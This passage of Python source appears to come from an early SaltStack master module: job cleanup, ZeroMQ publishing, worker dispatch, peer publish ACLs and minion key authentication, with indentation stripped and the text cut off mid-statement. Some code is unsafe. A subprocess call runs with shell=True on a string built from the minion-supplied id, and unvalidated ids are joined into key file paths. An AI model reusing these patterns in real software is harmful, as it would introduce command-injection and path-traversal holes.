jid_root = os.path.join(self.opts['cachedir'], 'jobs')
search = salt.search.Search(self.opts)
last = int(time.time())
fileserver = salt.fileserver.Fileserver(self.opts)
runners = salt.loader.runner(self.opts)
schedule = salt.utils.schedule.Schedule(self.opts, runners)
while True:
now = int(time.time())
loop_interval = int(self.opts['loop_interval'])
if self.opts['keep_jobs'] != 0 and (now - last) >= loop_interval:
cur = '{0:%Y%m%d%H}'.format(datetime.datetime.now())
for top in os.listdir(jid_root):
t_path = os.path.join(jid_root, top)
for final in os.listdir(t_path):
f_path = os.path.join(t_path, final)
jid_file = os.path.join(f_path, 'jid')
if not os.path.isfile(jid_file):
continue
with salt.utils.fopen(jid_file, 'r') as fn_:
jid = fn_.read()
if len(jid) < 18:
# Invalid jid, scrub the dir
shutil.rmtree(f_path)
elif int(cur) - int(jid[:10]) > self.opts['keep_jobs']:
shutil.rmtree(f_path)
if self.opts.get('search'):
if now - last > self.opts['search_index_interval']:
search.index()
try:
if not fileserver.servers:
log.error('No fileservers loaded, the master will not be '
'able to serve files to minions')
raise SaltMasterError('No fileserver backends available')
fileserver.update()
except Exception as exc:
log.error(
'Exception {0} occurred in file server update'.format(exc)
)
try:
schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if schedule.loop_interval < loop_interval:
loop_interval = schedule.loop_interval
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
try:
time.sleep(loop_interval)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check what our current max open files (ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.warning(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.warning('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.warning(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
def start(self):
'''
Turn on the master server components
'''
log.info(
'salt-master is starting as user \'{0}\''.format(getpass.getuser())
)
enable_sigusr1_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(('Caught signal {0}, stopping the Salt Master'
.format(signum)))
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 <= zmq < 3.0, there is only one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, 1)
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, 1)
pub_sock.setsockopt(zmq.RCVHWM, 1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
pull_sock.bind(pull_uri)
# Restrict access to the socket
os.chmod(
os.path.join(self.opts['sock_dir'],
'publish_pull.ipc'),
448
)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
pub_sock.send(package)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
finally:
if context.closed is False:
context.term()
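# A minimal sketch (not part of the original module) of how another master-side
# process hands a payload to the Publisher: connect a PUSH socket to the
# publish_pull.ipc endpoint and send the serialized bytes, which the Publisher
# loop above forwards to all subscribed minions. The opts dict is assumed to
# carry the same 'sock_dir' the Publisher was started with.
def _example_push_to_publisher(opts, payload_bytes):
    context = zmq.Context(1)
    push_sock = context.socket(zmq.PUSH)
    pull_uri = 'ipc://{0}'.format(
        os.path.join(opts['sock_dir'], 'publish_pull.ipc')
    )
    push_sock.connect(pull_uri)
    push_sock.send(payload_bytes)
    push_sock.setsockopt(zmq.LINGER, 1)
    push_sock.close()
    context.term()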
class ReqServer(object):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle))
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt event publisher interface
'''
# Start the event publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
if self.clients.closed is False:
self.clients.setsockopt(zmq.LINGER, 1)
self.clients.close()
if self.workers.closed is False:
self.workers.setsockopt(zmq.LINGER, 1)
self.workers.close()
if self.context.closed is False:
self.context.term()
# Also stop the workers
for worker in self.work_procs:
if worker.is_alive() is True:
worker.terminate()
def __del__(self):
self.destroy()
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# Properly handle EINTR from SIGUSR1
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
# Changes here create a zeromq condition, check with thatch45 before
# making any zeromq changes
except KeyboardInterrupt:
socket.close()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an aes key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
return self.aes_funcs.run_func(data['cmd'], data)
def run(self):
'''
Start a Master Worker
'''
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
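# A minimal sketch (not part of the original module) of the envelope shape that
# MWorker._handle_payload() above dispatches on: every request carries an 'enc'
# key ('clear', 'pub' or 'aes') plus a 'load' dict. The field values below are
# illustrative only; a real clear load is built by the minion or LocalClient.
_EXAMPLE_CLEAR_PAYLOAD = {
    'enc': 'clear',
    'load': {
        'cmd': '_auth',              # ClearFuncs method to invoke
        'id': 'minion1',             # id of the calling minion
        'pub': '-----BEGIN PUBLIC KEY-----\n...',
    },
}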
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Create the tops dict for loading external top data
self.tops = salt.loader.tops(self.opts)
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
self.__setup_fileserver()
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = fs_.serve_file
self._file_hash = fs_.file_hash
self._file_list = fs_.file_list
self._file_list_emptydirs = fs_.file_list_emptydirs
self._dir_list = fs_.dir_list
self._file_envs = fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as err:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, err))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError as err:
log.error('Unable to decrypt token: {0}'.format(err))
log.error('Salt minion claiming to be {0} has attempted to '
'communicate with the master and could not be verified'
.format(id_))
return False
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
if not 'id' in load:
log.error('Received call for external nodes without an id')
return {}
ret = {}
# The old ext_nodes method is set to be deprecated in 0.10.4
# and should be removed within 3-5 releases in favor of the
# "master_tops" system
if self.opts['external_nodes']:
if not salt.utils.which(self.opts['external_nodes']):
log.error(('Specified external nodes controller {0} is not'
' available, please verify that it is installed'
'').format(self.opts['external_nodes']))
return {}
cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id'])
ndata = yaml.safe_load(
subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE
).communicate()[0])
if 'environment' in ndata:
env = ndata['environment']
else:
env = 'base'
if 'classes' in ndata:
if isinstance(ndata['classes'], dict):
ret[env] = list(ndata['classes'])
elif isinstance(ndata['classes'], list):
ret[env] = ndata['classes']
else:
return ret
# Evaluate all configured master_tops interfaces
opts = {}
grains = {}
if 'opts' in load:
opts = load['opts']
if 'grains' in load['opts']:
grains = load['opts']['grains']
for fun in self.tops:
try:
ret.update(self.tops[fun](opts=opts, grains=grains))
except Exception as exc:
log.error(
('Top function {0} failed with error {1} for minion '
'{2}').format(fun, exc, load['id'])
)
# If anything happens in the top generation, log it and move on
pass
return ret
def _master_opts(self, load):
'''
Return the master options to the minion
'''
mopts = dict(self.opts)
file_roots = dict(mopts['file_roots'])
file_roots = {}
envs = self._file_envs()
for env in envs:
if not env in file_roots:
file_roots[env] = []
mopts['file_roots'] = file_roots
return mopts
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if 'id' not in load or 'grains' not in load or 'env' not in load:
return False
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load['env'])
data = pillar.compile_pillar()
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
return data
# This broken method makes the master die, pulling out until we can
# finish the masterstate system
# def _master_state(self, load):
# '''
# Call the master to compile a master side highstate
# '''
# if 'opts' not in load or 'grains' not in load:
# return False
# return salt.state.master_compile(
# self.opts,
# load['opts'],
# load['grains'],
# load['opts']['id'],
# load['opts']['environment'])
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
if 'id' not in load:
return False
if not 'events' in load:
if 'tag' not in load or 'data' not in load:
return False
if 'events' in load:
for event in load['events']:
self.event.fire_event(event, event['tag'])
else:
tag = load['tag']
self.event.fire_event(load, tag)
return True
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if 'return' not in load or 'jid' not in load or 'id' not in load:
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type'])
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid'])
if self.opts['master_ext_job_cache']:
fstr = '{0}.returner'.format(self.opts['master_ext_job_cache'])
self.mminion.returners[fstr](load)
return
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
hn_dir = os.path.join(jid_dir, load['id'])
if not os.path.isdir(hn_dir):
os.makedirs(hn_dir)
# Otherwise the minion has already returned this jid and it should
# be dropped
else:
log.error(
('An extra return was detected from minion {0}, please'
' verify the minion, this could be a replay'
' attack').format(load['id'])
)
return False
self.serial.dump(
load['return'],
# Use atomic open here to avoid the file being read before it's
# completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'return.p'), 'w+'
)
)
if 'out' in load:
self.serial.dump(
load['out'],
# Use atomic open here to avoid the file being read before
# it's completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'out.p'), 'w+'
)
)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if 'return' not in load or 'jid' not in load or 'id' not in load:
return None
# set the write flag
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id']))
try:
with salt.utils.fopen(wtag, 'w+') as fp_:
fp_.write('')
except (IOError, OSError):
log.error(
('Failed to commit the write tag for the syndic return,'
' are permissions correct in the cache dir:'
' {0}?').format(self.opts['cachedir']
)
)
return False
# Format individual return loads
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
if os.path.isfile(wtag):
os.remove(wtag)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
if 'peer_run' not in self.opts:
return {}
if not isinstance(self.opts['peer_run'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'id' not in clear_load\
or 'tok' not in clear_load:
return {}
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = set()
for match in self.opts['peer_run']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer_run'][match], list):
perms.update(self.opts['peer_run'][match])
good = False
for perm in perms:
if re.match(perm, clear_load['fun']):
good = True
if not good:
return {}
# Prepare the runner object
opts = {'fun': clear_load['fun'],
'arg': clear_load['arg'],
'id': clear_load['id'],
'doc': False,
'conf_file': self.opts['conf_file']}
opts.update(self.opts)
runner = salt.runner.Runner(opts)
return runner.run()
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions.
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return {}
if not isinstance(self.opts['peer'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'tgt' not in clear_load\
or 'ret' not in clear_load\
or 'tok' not in clear_load\
or 'id' not in clear_load:
return {}
# If the command will make a recursive publish don't run
if re.match('publish.*', clear_load['fun']):
return {}
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
good = self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
return {}
# Set up the publication payload
jid = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt_type': clear_load.get('tgt_type', 'glob'),
'tgt': clear_load['tgt'],
'jid': jid,
'ret': clear_load['ret'],
'id': clear_load['id'],
}
self.serial.dump(
load, salt.utils.fopen(
os.path.join(
salt.utils.jid_dir(
jid,
self.opts['cachedir'],
self.opts['hash_type']
),
'.load.p'
),
'w+')
)
# Save the load to the ext_job_cache if it is turned on
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
payload = {'enc': 'aes'}
expr_form = 'glob'
timeout = 5
if 'tmo' in clear_load:
try:
timeout = int(clear_load['tmo'])
except ValueError:
msg = 'Failed to parse timeout value: {0}'.format(
clear_load['tmo'])
log.warn(msg)
return {}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
expr_form = load['tgt_type']
if 'timeout' in clear_load:
timeout = clear_load['timeout']
# Encrypt!
payload['load'] = self.crypticle.dumps(load)
# Set the subscriber to the jid before publishing the command
self.local.event.subscribe(load['jid'])
# Connect to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
log.info(('Publishing minion job: #{jid}, func: "{fun}", args:'
' "{arg}", target: "{tgt}"').format(**load))
pub_sock.send(self.serial.dumps(payload))
# Run the client get_returns method based on the form data sent
if 'form' in clear_load:
ret_form = clear_load['form']
else:
ret_form = 'clean'
if ret_form == 'clean':
try:
return self.local.get_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
finally:
self.local.event.unsubscribe(load['jid'])
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if context.closed is False:
context.term()
elif ret_form == 'full':
ret = self.local.get_full_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
ret['__jid__'] = jid
try:
return ret
finally:
self.local.event.unsubscribe(load['jid'])
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if context.closed is False:
context.term()
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
ret = getattr(self, func)(load)
else:
log.error(('Received function {0} which is unavailable on the '
'master, returning False').format(func))
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if not load.get('ver') == '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific aes key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(ret)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
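# A simplified sketch (not part of the original module) of the 'peer' ACL
# matching that AESFuncs.minion_publish() above performs before allowing a
# minion-initiated publish: minion ids are matched against the config keys as
# regexes, and the collected value regexes are then checked against the
# requested function. The real code hands the collected perms to
# CkMinions.auth_check(); here that step is approximated with a plain
# re.match on the function name, and the example config is illustrative only.
def _example_peer_allowed(peer_config, minion_id, fun):
    perms = []
    for match in peer_config:
        if re.match(match, minion_id):
            if isinstance(peer_config[match], list):
                perms.extend(peer_config[match])
    return any(re.match(perm, fun) for perm in perms)

# _example_peer_allowed({'foo.example.com': ['test.*']}, 'foo.example.com', 'test.ping') -> True
# _example_peer_allowed({'foo.example.com': ['test.*']}, 'foo.example.com', 'cmd.run')   -> False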
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
def _send_cluster(self):
'''
Send the cluster data out
'''
log.debug('Sending out cluster data')
ret = self.local.cmd(self.opts['cluster_masters'],
'cluster.distrib',
self._cluster_load(),
0,
'list'
)
log.debug('Cluster distributed: {0}'.format(ret))
def _cluster_load(self):
'''
Generates the data sent to the cluster nodes.
'''
minions = {}
master_pem = ''
with salt.utils.fopen(self.opts['conf_file'], 'r') as fp_:
master_conf = fp_.read()
minion_dir = os.path.join(self.opts['pki_dir'], 'minions')
for host in os.listdir(minion_dir):
pub = os.path.join(minion_dir, host)
minions[host] = salt.utils.fopen(pub, 'r').read()
if self.opts['cluster_mode'] == 'full':
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
with salt.utils.fopen(master_pem_path) as fp_:
master_pem = fp_.read()
return [minions,
master_conf,
master_pem,
self.opts['conf_file']]
def _check_permissions(self, filename):
'''
check if the specified filename has correct permissions
'''
if 'os' in os.environ:
if os.environ['os'].startswith('Windows'):
return True
import pwd # after confirming not running Windows
import grp
try:
user = self.opts['user']
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except KeyError:
err = ('Failed to determine groups for user '
'{0}. The user is not available.\n').format(user)
log.error(err)
return False
fmode = os.stat(filename)
if os.getuid() == 0:
if fmode.st_uid == uid or not fmode.st_gid == gid:
return True
elif self.opts.get('permissive_pki_access', False) \
and fmode.st_gid in groups:
return True
else:
if stat.S_IWOTH & fmode.st_mode:
# don't allow others to write to the file
return False
# check group flags
if self.opts.get('permissive_pki_access', False) \
and stat.S_IWGRP & fmode.st_mode:
return True
elif stat.S_IWGRP & fmode.st_mode:
return False
# allow only if not writable by group or other
if not (stat.S_IWGRP & fmode.st_mode or
stat.S_IWOTH & fmode.st_mode):
return True
return False
def _check_autosign(self, keyid):
'''
Checks if the specified keyid should automatically be signed.
'''
if self.opts['auto_accept']:
return True
autosign_file = self.opts.get("autosign_file", None)
if not autosign_file or not os.path.exists(autosign_file):
return False
if not self._check_permissions(autosign_file):
message = "Wrong permissions for {0}, ignoring content"
log.warn(message.format(autosign_file))
return False
with salt.utils.fopen(autosign_file, 'r') as fp_:
for line in fp_:
line = line.strip()
if line.startswith('#'):
continue
if line == keyid:
return True
if fnmatch.fnmatch(keyid, line):
return True
try:
if re.match(line, keyid):
return True
except re.error:
message = ('{0} is not a valid regular expression, '
'ignoring line in {1}')
log.warn(message.format(line, autosign_file))
continue
return False
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the aes key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
'''
# 0. Check for max open files
# 1. Verify that the key we are receiving matches the stored key
# 2. Store the key if it is not there
# 3. make an rsa key with the pub key
# 4. encrypt the aes key as an encrypted salt.payload
# 5. package the return and return it
salt.utils.verify.check_max_open_files(self.opts)
log.info('Authentication request from {id}'.format(**load))
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn):
# The key has been accepted check it
if not salt.utils.fopen(pubfn, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif not os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This is a new key, stick it in pre
log.info(
'New public key placed in pending for {id}'.format(**load)
)
with salt.utils.fopen(pubfn_pend, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': True}}
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This key is in pending, if it is the same key ret True, else
# ret False
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key '
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': True}}
elif os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This key is in pending, if it is the same key auto accept it
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
elif not os.path.isfile(pubfn_pend)\
